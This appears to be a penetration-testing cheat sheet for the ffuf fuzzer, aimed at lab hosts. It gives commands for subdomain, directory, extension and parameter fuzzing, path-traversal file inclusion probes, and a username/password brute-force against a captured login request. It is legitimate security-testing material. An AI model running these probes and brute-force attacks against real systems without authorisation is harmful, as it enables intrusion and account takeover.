Essential FFuF

Subdomain Enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.machine.htb/
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://FUZZ.machine.htb/

Directory Fuzzing with Small Wordlist

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt:FUZZ -u http://localhost:8080/FUZZ

File Extension Fuzzing

ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://localhost:8080/indexFUZZ

Specific File Format Fuzzing

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt:FUZZ -u http://localhost:8080/FUZZ.aspx
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost:8080/FUZZ.cgi

Parameter Fuzzing with Custom Filter

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://localhost:8080/file.php?FUZZ=id' -fs 2309

LFI Fuzzing with Custom Wordlist

# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://localhost:8080/index.php?view=FUZZ' -fs 2309
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://localhost:8080/index.php?language=../../../../FUZZ' -fs 2287

Brute-Force with Request File from BurpSuite

POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"USERFUZZ","password":"PASSFUZZ"}

ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200